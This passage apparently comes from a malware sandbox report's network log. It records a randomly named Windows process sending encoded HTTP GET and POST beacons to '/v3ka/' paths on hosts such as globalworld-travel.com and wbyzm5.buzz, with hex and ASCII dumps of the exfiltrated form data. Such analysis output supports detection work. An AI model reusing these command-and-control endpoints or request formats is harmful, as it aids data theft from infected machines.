6f 6a 70 4f 51 6c 44 7a 56 55 76 44 68 67 46 30 46 44 77 30 67 63 77 6a 51 7a 72 43 70 2b 34 35 42 32 69 57 30 73 42 4d 41 78 72 36 66 46 51 32 38 4f 53 32 53 66 42 39 42 32 32 2f 69 33 69 2f 62 74 59 42 55 78 7a 53 4f 58 4f 62 6c 7a 69 72 50 31 70 38 48 39 36 57 76 30 30 43 41 58 69 38 46 74 46 42 4c 78 7a 64 4c 53 5a 63 35 43 2b 4c 76 6e 6d 32 51 2f 36 50 4c 31 56 2b 35 47 66 59 35 36 6b 4b 48 76 46 75 32 46 31 77 39 50 76 4e 51 45 68 47 59 75 49 31 63 72 31 46 6b 32 4a 38 71 65 48 66 65 45 36 31 59 6f 62 33 34 74 51 66 36 4b 69 7a 4c 48 46 78 56 7a 53 47 46 32 65 36 6e 2f 43 32 46 38 6e 6c 6b 6a 44 79 59 52 70 4c 37 59 79 73 71 32 50 42 74 74 7a 6f 64 78 39 72 73 33 66 79 76 33 74 53 4e 4b 35 74 72 67 30 47 6a 75 71 78 48 5a 6a 36 66 47 4c 56 67 4b 33 72 53 73 61 4d 65 4a 77 5a 70 66 6a 64 65 6b 66 55 75 43 5a 50 45 39 61 74 69 2b 2f 6f 4f 69 58 62 44 56 61 63 52 46 39 31 66 4f 42 4a 72 39 70 34 31 48 68 39 77 63 78 30 43 34 71 6f 51 63 4e 6d 6a 7a 2b 65 6c 52 58 49 63 46 36 4a 68 55 55 70 47 34 42 64 79 68 53 38 44 47 76 48 7a 54 72 47 66 64 43 46 2b 70 5a 67 79 67 78 33 56 58 74 50 64 51 46 66 6c 37 44 42 55 72 68 67 72 6f 56 49 46 5a 36 6b 43 6d 37 4e 35 59 54 69 32 49 30 34 74 6c 70 6f 70 65 77 2b 74 2b 68 2b 55 Data Ascii: nf8dPP8p=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
Feb 28, 2024 15:47:27.007574081 CET	5144	OUT	Data Raw: 65 42 6d 68 77 30 52 52 72 31 63 79 6c 39 41 71 75 73 43 7a 45 56 31 72 65 62 70 54 50 69 6a 61 6a 64 6f 70 58 6c 2f 65 6f 54 57 6a 7a 35 52 2f 4e 45 44 55 64 39 74 50 31 4b 35 4b 48 65 5a 52 4d 52 4b 36 4d 50 6f 6d 57 78 42 78 76 49 66 5a 4b 52 Data Ascii: eBmhw0RRr1cyl9AqusCzEV1rebpTPijajdopXl/eoTWjz5R/NEDUd9tP1K5KHeZRMRK6MPomWxBxvIfZKRHuWyd6+6FhOPRcDg4VVf2uuKz5ANrE6M02ds4S91zpOnprQIQ+iEGhFJl8UNUizCtQKZfy2yJilK00BcJSFMJYy0g8cXgFnUs3D3/LqO9Fg6R36egMxpJOGPKNGJ301/WSo7HWOk3u7cR65nwbP3MJxQ8qsws6GxD
Feb 28, 2024 15:47:27.007622957 CET	5144	OUT	Data Raw: 4d 4c 47 57 52 4b 77 54 41 57 56 50 4e 6c 72 52 63 45 73 5a 6b 34 44 44 30 32 49 69 33 61 7a 59 6c 42 39 50 68 63 54 33 30 6e 61 32 57 48 48 64 51 62 47 69 4b 4e 65 42 57 4c 4e 6f 6e 50 66 38 6a 6e 76 6d 46 6c 46 2f 48 75 45 56 36 51 75 71 66 39 Data Ascii: MLGWRKwTAWVPNlrRcEsZk4DD02Ii3azYlB9PhcT30na2WHHdQbGiKNeBWLNonPf8jnvmFlF/HuEV6Quqf9/gm1qShsuKkpCZobnHrXJE7Qf7wYDJW3mNLRzSOgmRUbTKJFlUxGR91EmsrI5fk4tbPAdhsb0VNr8D3H4Y7JD9wWoMwoCoz6HWQW+Lrl6iLd+eq5dKqLE9WWITxdRXXSyAV+i0ZGttcQX+APbnbc2nyKk7rqR862B
Feb 28, 2024 15:47:27.322252035 CET	2572	OUT	Data Raw: 58 67 39 66 4f 42 70 65 6b 36 63 2b 57 2b 52 62 6b 54 6a 2f 58 46 36 50 69 45 4f 34 38 30 67 48 53 61 6b 45 56 53 68 52 46 55 30 6b 5a 6c 64 37 71 49 45 64 42 5a 70 35 41 54 67 72 4b 46 32 54 36 62 66 74 55 74 4a 68 56 4a 79 30 30 74 68 47 48 64 Data Ascii: Xg9fOBpek6c+W+RbkTj/XF6PiEO480gHSakEVShRFU0kZld7qIEdBZp5ATgrKF2T6bftUtJhVJy00thGHdXPWzrnlI72uqt8Zt0z4amhgzQuT4u7uGzBn/pbZVmZrBWYtvTu/eJXdqYDD2I4ERXfjc+fEJkrkpmvom1Z5uFUpVDfuXNY6xEkXxUz0MZnzXHsW5fOZHD1bhq8xQBYJxdD2lyFnAdZQB5uMKIw3JjdN4z+wjQllep
Feb 28, 2024 15:47:27.322421074 CET	7716	OUT	Data Raw: 57 7a 39 58 70 44 45 4e 70 4f 4d 77 48 47 36 72 54 76 41 72 49 42 36 71 61 59 68 63 6c 4d 30 37 50 4c 50 4c 52 50 64 4f 4d 42 70 72 77 41 41 55 69 39 64 4c 76 47 70 37 57 6f 39 31 75 50 43 54 49 43 63 6a 74 7a 37 43 78 34 72 42 53 68 53 73 52 6e Data Ascii: Wz9XpDENpOMwHG6rTvArIB6qaYhclM07PLPLRPdOMBprwAAUi9dLvGp7Wo91uPCTICcjtz7Cx4rBShSsRnfJJgGaMsog2IXFIRWDmjOrJ3rVFRXM6ZGgD/4Pubi4BBRPYKqffb1yKwoZgNz/gQrmWmE5rRRloXP1CWyHKp9ybEFxeFzL+zF0S0ZVvEb3PmuRZTu1lWW/KHbR2u+Appdj2p3leg10+mDkNXgeeYDUwxp/p/Z8Nyo
Feb 28, 2024 15:47:27.322551012 CET	678	IN	HTTP/1.1 307 Temporary Redirect Date: Wed, 28 Feb 2024 14:47:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 expires: Thu, 01 Jan 1970 00:00:01 GMT referer-policy: same-origin set-cookie: o2s-chl=e522bf5b7b0b1bf913e2fd6f784de0ac; domain=.globalworld-travel.com; expires=Thu, 29-Feb-24 14:47:27 GMT; path=/; SameSite=Lax; HttpOnly location: http://www.globalworld-travel.com/v3ka/ tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect Server: o2switch-PowerBoost-v3 Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10
Feb 28, 2024 15:47:27.322599888 CET	15432	OUT	Data Raw: 4d 66 78 50 76 46 76 78 61 2f 50 6b 51 66 76 4f 73 78 35 47 65 32 4c 57 6a 79 4c 6f 6c 52 72 43 45 78 75 65 42 44 62 65 76 64 6a 44 6f 39 6d 6a 75 6a 2b 74 38 46 6e 77 32 53 58 32 71 42 66 2f 37 59 4c 71 4e 2b 48 42 53 79 47 79 64 2b 37 76 67 2f Data Ascii: MfxPvFvxa/PkQfvOsx5Ge2LWjyLolRrCExueBDbevdjDo9mjuj+t8Fnw2SX2qBf/7YLqN+HBSyGyd+7vg/XoefjbD7cHgFUKpfDVuJjU+s1Kzc1kdd4oBrgALdbmzPCNndCnB94RKhi1w0GJ7PUAN9PX5iKghT5J1NJYshBy/169yLtIbwspuZeONEB5++RwcLdy/gNcKLxYoGmf2GoR+yVYzOqrctvPtyjFHr9hKBvsL2v8q1f
Feb 28, 2024 15:47:27.637360096 CET	2572	OUT	Data Raw: 38 35 55 35 64 6f 43 75 46 67 39 77 4f 58 4e 58 2b 45 73 42 61 30 75 4f 50 47 7a 6c 39 30 49 6c 46 53 6d 56 69 47 72 55 69 57 4d 31 55 34 6d 49 6b 58 36 6f 4e 2f 6c 55 39 49 33 49 44 43 72 74 69 42 70 5a 4a 31 42 65 74 4e 6f 4a 31 4d 77 61 6d 2b Data Ascii: 85U5doCuFg9wOXNX+EsBa0uOPGzl90IlFSmViGrUiWM1U4mIkX6oN/lU9I3IDCrtiBpZJ1BetNoJ1Mwam+bW6N9lUVoEnH9zNivYHDCYlIX8cgbfvSEz5bqPL37JtYd4xqx28IMyYjISDdBM/oAhDxdWlMgafjnHaWCDE3uifSULp+lg89OdNkA4rVvnboYzVKyTPB28VXcAH7M3k44MkK24KKgeO1Z8vy2IRgHLLxvLA+cSKXM
Feb 28, 2024 15:47:27.637491941 CET	11574	OUT	Data Raw: 5a 7a 48 44 6c 42 42 73 57 71 38 66 73 70 49 36 47 33 61 52 64 36 48 7a 36 38 4a 77 69 39 47 4a 49 77 2b 6c 6f 52 69 36 4e 4b 30 70 4a 35 39 6c 4a 56 34 4f 74 42 65 2b 64 46 64 44 72 51 33 49 57 63 58 43 5a 4d 38 74 2b 45 6f 35 6a 67 75 72 61 4c Data Ascii: ZzHDlBBsWq8fspI6G3aRd6Hz68Jwi9GJIw+loRi6NK0pJ59lJV4OtBe+dFdDrQ3IWcXCZM8t+Eo5jguraLu9Qgf0Tg+HHtdjlVFSkMQxKnOClbylG6y3ZBhck0MrY/3OUpQXqlaZ8/H8FXdDYFwl2BNwFeBtQzKvKTu10UGib54S7usOgrFlakxMqcQZcvSbygYp85gvfKjOqUHNQWN/8QBWVzn9Y+I9k5TWQgvxF4PAd3Ppzv5
Feb 28, 2024 15:47:27.637563944 CET	758	OUT	Data Raw: 53 67 6b 52 4e 76 6e 39 56 42 79 2b 67 54 50 43 50 70 55 55 44 6c 6d 75 62 72 46 37 71 38 64 49 37 62 4d 35 63 72 59 30 78 48 69 43 53 76 62 39 7a 32 4d 45 71 43 58 45 31 65 4a 37 4c 51 75 46 6b 36 55 32 49 43 77 61 63 48 4d 76 4d 70 34 74 47 75 Data Ascii: SgkRNvn9VBy+gTPCPpUUDlmubrF7q8dI7bM5crY0xHiCSvb9z2MEqCXE1eJ7LQuFk6U2ICwacHMvMp4tGuV9jqI76WxHJ7NtI+T9GzyPCJZTZhx0VNBQhdnL9qZk2jTVUaxSIQc8UTA8fWANUABwk4L+LM/uvokPPfo6QH1xmU7D384eKWd4ARh8A5i/h6CtpTq4Zlr1IgllQ5TIpLrnTZmtB9TcuEHtXmXZf8aWMu/Tashpksk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.11.20	50267	109.234.166.81	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:47:29.845065117 CET	471	OUT	GET /v3ka/?nf8dPP8p=FpC4ctUTedBaFzLPjh5PBN9Vwn38xnWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkAgyH1KJ2P8kSR36Iuo=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.globalworld-travel.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:47:30.443458080 CET	495	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 28 Feb 2024 14:47:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://globalworld-travel.com/v3ka/?nf8dPP8p=FpC4ctUTedBaFzLPjh5PBN9Vwn38xnWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkAgyH1KJ2P8kSR36Iuo=&L0=2tHtHNWXtBDdYR Server: o2switch-PowerBoost-v3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.11.20	50272	172.67.130.3	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:01.236638069 CET	721	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.wbyzm5.buzz Origin: http://www.wbyzm5.buzz Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.wbyzm5.buzz/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 30 42 36 6b 65 41 38 79 70 4d 56 50 6d 54 35 4e 51 68 35 75 58 37 77 2f 70 49 36 2f 6e 49 43 35 44 78 2f 48 68 58 59 4c 64 77 53 49 52 66 37 47 4f 62 4b 44 45 75 51 55 47 77 70 36 75 38 39 58 6a 53 73 6f 50 64 51 63 36 59 59 71 54 68 30 4d 52 45 74 44 63 71 68 63 66 53 6e 69 58 76 4a 4b 73 38 51 45 67 2f 49 4e 64 75 61 70 30 43 75 62 7a 7a 57 4e 67 49 4b 67 35 2f 52 54 44 61 4e 49 68 47 67 31 47 34 62 4e 4c 53 51 7a 35 48 65 62 2b 64 76 61 45 39 75 77 32 79 56 2b 6f 38 76 37 43 41 50 4a 55 52 4c 74 64 75 50 34 2f 69 6e 37 2f 5a 67 44 37 4d 4c 43 68 57 53 6b 76 6b 75 44 4a 41 3d 3d Data Ascii: nf8dPP8p=0B6keA8ypMVPmT5NQh5uX7w/pI6/nIC5Dx/HhXYLdwSIRf7GObKDEuQUGwp6u89XjSsoPdQc6YYqTh0MREtDcqhcfSniXvJKs8QEg/INduap0CubzzWNgIKg5/RTDaNIhGg1G4bNLSQz5Heb+dvaE9uw2yV+o8v7CAPJURLtduP4/in7/ZgD7MLChWSkvkuDJA==
Feb 28, 2024 15:50:01.406229019 CET	664	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 28 Feb 2024 14:50:01 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 28 Feb 2024 15:50:01 GMT Location: https://www.wbyzm5.buzz/v3ka/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MZItyDExNdiU5ETeGKJ%2Bd2yRV%2Ff%2FfhvAQJKEtie6N9N0j0YujURTfbFn8Gh%2FuuhAWQAHNUgaXp8V55Kk1VaEOB8L%2F1VgGXHvjI6RGh3%2FQu9L9SlYCzIDPbJyyN3FkivvtXU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 85c97a3e3eaa5269-LAX alt-svc: h2=":443"; ma=60 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.11.20	50273	172.67.130.3	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:03.923707008 CET	1061	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.wbyzm5.buzz Origin: http://www.wbyzm5.buzz Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.wbyzm5.buzz/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 30 42 36 6b 65 41 38 79 70 4d 56 50 6d 79 4a 4e 44 57 4e 75 47 4c 77 34 31 59 36 2f 74 6f 43 39 44 78 7a 48 68 58 77 6c 64 47 69 49 52 2f 72 47 50 61 4b 44 44 75 51 55 53 67 70 46 7a 4d 39 69 6a 53 67 67 50 66 45 63 36 59 6b 71 51 30 34 4d 59 55 74 63 54 4b 68 66 49 69 6e 2f 54 76 49 46 73 38 63 69 67 37 6f 4e 64 39 4f 70 6c 78 47 62 33 69 57 4f 71 49 4b 6d 2f 2f 52 51 4a 36 4e 61 68 47 38 4c 47 39 33 64 4c 67 4d 7a 35 6d 2b 62 2f 64 76 5a 4f 4e 76 32 39 53 55 6d 67 4e 79 68 4a 42 76 71 64 7a 48 4f 59 62 50 6d 7a 77 4f 32 6d 62 63 36 73 63 48 45 34 55 4c 58 73 51 33 45 63 5a 55 4c 50 49 75 62 79 55 50 38 71 56 55 52 51 49 34 6b 68 58 77 4a 48 79 53 2f 45 6d 4f 67 35 59 4a 45 42 31 55 31 6e 34 56 4c 4a 44 59 31 68 4b 34 4d 30 4c 4a 35 51 37 76 63 67 63 4d 37 33 4a 73 33 39 66 68 30 6e 5a 48 63 63 46 73 6e 53 47 4f 64 58 32 44 6b 71 79 32 63 34 2f 62 78 50 39 46 41 6f 48 59 6d 30 46 74 64 41 6f 30 38 69 64 77 65 47 73 63 48 69 55 72 6a 43 4b 4c 6a 65 75 47 70 48 50 4d 61 57 53 65 4a 58 46 38 37 47 6c 6d 53 51 77 7a 51 4d 30 6a 79 42 42 64 58 6e 45 7a 73 6f 63 77 37 36 4c 71 54 49 47 34 66 61 4b 72 57 74 72 44 47 57 34 6e 32 36 67 41 6f 55 73 36 71 2b 73 53 4c 2f 46 63 68 42 6f 76 69 46 56 52 42 67 56 67 65 75 52 34 38 56 79 64 55 64 52 64 52 46 67 46 74 6d 39 4c 45 58 61 37 75 42 68 4a 37 2b 62 4a 4e 66 44 74 30 2f 55 30 49 64 64 35 42 57 42 6a 46 62 68 53 74 73 70 4f 6d 37 6c 6d 50 61 51 31 34 6e 31 4d 63 64 4d 45 41 6c 31 52 6b 45 7a 47 45 33 44 55 76 72 55 64 6d 4c 68 73 53 59 51 64 6d 77 38 42 75 6d 47 65 6e 6b 66 64 43 75 41 4d 78 79 34 52 2b 30 4e 70 6a 67 45 32 43 43 57 67 3d Data Ascii: nf8dPP8p=0B6keA8ypMVPmyJNDWNuGLw41Y6/toC9DxzHhXwldGiIR/rGPaKDDuQUSgpFzM9ijSggPfEc6YkqQ04MYUtcTKhfIin/TvIFs8cig7oNd9OplxGb3iWOqIKm//RQJ6NahG8LG93dLgMz5m+b/dvZONv29SUmgNyhJBvqdzHOYbPmzwO2mbc6scHE4ULXsQ3EcZULPIubyUP8qVURQI4khXwJHyS/EmOg5YJEB1U1n4VLJDY1hK4M0LJ5Q7vcgcM73Js39fh0nZHccFsnSGOdX2Dkqy2c4/bxP9FAoHYm0FtdAo08idweGscHiUrjCKLjeuGpHPMaWSeJXF87GlmSQwzQM0jyBBdXnEzsocw76LqTIG4faKrWtrDGW4n26gAoUs6q+sSL/FchBoviFVRBgVgeuR48VydUdRdRFgFtm9LEXa7uBhJ7+bJNfDt0/U0Idd5BWBjFbhStspOm7lmPaQ14n1McdMEAl1RkEzGE3DUvrUdmLhsSYQdmw8BumGenkfdCuAMxy4R+0NpjgE2CCWg=
Feb 28, 2024 15:50:04.096843958 CET	656	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 28 Feb 2024 14:50:04 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 28 Feb 2024 15:50:04 GMT Location: https://www.wbyzm5.buzz/v3ka/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vvqBR7FnmxXCGABaSt6%2Fe7H2naAeLK3SglwSKSNogSHZJedVocVGuLmnFCTmOe23fYwwppZRBzhpX2UVxZLST%2FL33YYMAC9eZOdeNtRkXgPS4oWRYjlczh4ujmJFTx1DOSM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 85c97a4f09e12ed8-LAX alt-svc: h2=":443"; ma=60 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.11.20	50274	172.67.130.3	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:06.611884117 CET	1286	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.wbyzm5.buzz Origin: http://www.wbyzm5.buzz Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.wbyzm5.buzz/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 30 42 36 6b 65 41 38 79 70 4d 56 50 6d 79 4a 4e 44 57 4e 75 47 4c 77 34 31 59 36 2f 74 6f 43 39 44 78 7a 48 68 58 77 6c 64 47 71 49 51 4d 54 47 4f 39 6d 44 43 75 51 55 4f 51 70 41 7a 4d 39 46 6a 53 34 6b 50 66 49 4d 36 64 6f 71 51 44 38 4d 59 6d 31 63 57 4b 68 65 45 43 6e 39 58 76 4a 45 73 38 51 32 67 37 38 64 64 75 53 70 30 43 65 62 7a 52 2b 4e 6f 59 4b 67 2f 2f 52 63 65 4b 4e 6b 68 47 34 62 47 39 7a 64 4c 69 6f 7a 35 56 47 62 39 4b 62 5a 48 39 76 35 30 79 55 69 35 39 79 69 4a 42 72 2b 64 7a 47 7a 59 66 58 6d 7a 7a 32 32 6c 59 45 39 74 38 48 45 6d 45 4c 55 37 67 79 4e 63 5a 4a 57 50 4a 61 62 79 54 7a 38 72 31 55 52 42 64 4d 6c 32 48 77 50 44 79 53 53 54 32 43 6f 35 59 64 36 42 33 59 31 6b 49 42 4c 4c 77 77 31 6e 6f 41 4d 36 4c 4a 37 50 72 75 59 71 38 4d 2f 33 4a 38 42 39 66 42 37 6e 62 4c 63 64 67 59 6e 45 7a 36 53 54 57 43 76 6c 53 32 4e 75 2f 58 31 50 35 67 5a 6f 48 5a 35 30 45 35 64 42 59 45 38 6a 59 51 5a 4c 63 64 4e 76 30 71 70 56 61 48 70 65 75 4b 68 48 50 56 43 57 56 2b 4a 55 6c 38 37 41 46 61 56 61 41 79 35 45 55 6a 73 46 42 64 41 6e 45 2f 4f 6f 5a 52 5a 39 36 47 54 5a 6d 6f 66 65 61 72 58 37 37 43 50 4d 49 6e 77 74 77 41 6f 55 73 6d 2b 2b 73 65 4c 2b 77 34 68 54 50 4c 69 54 57 4a 42 69 56 67 63 75 52 34 68 56 79 52 6e 64 58 46 7a 46 68 31 4c 6d 35 76 45 5a 71 48 75 50 44 68 30 37 72 4a 55 62 44 74 64 69 42 73 68 64 64 56 4a 57 43 4c 7a 62 54 6d 74 74 6f 79 6d 2f 6c 6d 41 4d 41 31 2f 67 31 4d 4b 5a 4d 35 42 6c 31 63 54 45 79 7a 50 33 42 45 76 72 67 59 46 54 46 64 50 4c 32 49 71 36 34 39 36 76 48 33 77 37 75 4a 6a 72 52 73 4c 73 2f 6c 79 6f 65 6f 73 30 45 57 66 57 6a 65 71 63 43 4f 78 59 6f 6b 70 6e 6c 44 4c 42 77 53 68 68 62 35 45 47 57 58 2b 6d 7a 78 69 42 72 63 32 59 35 6c 64 62 75 52 66 44 6b 4e 4f 7a 75 78 39 63 78 67 30 5a 58 4f 44 62 6d 72 42 4f 38 75 51 43 5a 4a 52 4f 6b 6e 66 6c 50 77 77 68 45 76 33 35 45 2b 6c 2b 71 55 61 37 33 78 36 58 57 47 38 4c 31 4a 36 2f 37 54 34 54 63 63 69 68 31 65 4b 49 44 31 62 51 68 75 6b 36 79 66 30 2b 51 59 79 41 4d 31 44 4d 62 71 51 61 6c 41 33 35 77 42 47 6d 4b 62 62 39 6c 6d 47 53 70 4d 77 47 76 4c 39 70 70 4d 65 71 56 69 45 58 43 79 48 75 52 48 67 73 6e 43 4a 52 72 30 6c 36 47 76 36 36 63 71 35 75 69 6c 7a 48 63 51 38 6e 50 53 6a 45 58 76 70 65 4f 2f 4a 4e 79 71 53 6d 58 77 36 78 76 31 Data Ascii: nf8dPP8p=0B6keA8ypMVPmyJNDWNuGLw41Y6/toC9DxzHhXwldGqIQMTGO9mDCuQUOQpAzM9FjS4kPfIM6doqQD8MYm1cWKheECn9XvJEs8Q2g78dduSp0CebzR+NoYKg//RceKNkhG4bG9zdLioz5VGb9KbZH9v50yUi59yiJBr+dzGzYfXmzz22lYE9t8HEmELU7gyNcZJWPJabyTz8r1URBdMl2HwPDySST2Co5Yd6B3Y1kIBLLww1noAM6LJ7PruYq8M/3J8B9fB7nbLcdgYnEz6STWCvlS2Nu/X1P5gZoHZ50E5dBYE8jYQZLcdNv0qpVaHpeuKhHPVCWV+JUl87AFaVaAy5EUjsFBdAnE/OoZRZ96GTZmofearX77CPMInwtwAoUsm++seL+w4hTPLiTWJBiVgcuR4hVyRndXFzFh1Lm5vEZqHuPDh07rJUbDtdiBshddVJWCLzbTmttoym/lmAMA1/g1MKZM5Bl1cTEyzP3BEvrgYFTFdPL2Iq6496vH3w7uJjrRsLs/lyoeos0EWfWjeqcCOxYokpnlDLBwShhb5EGWX+mzxiBrc2Y5ldbuRfDkNOzux9cxg0ZXODbmrBO8uQCZJROknflPwwhEv35E+l+qUa73x6XWG8L1J6/7T4Tccih1eKID1bQhuk6yf0+QYyAM1DMbqQalA35wBGmKbb9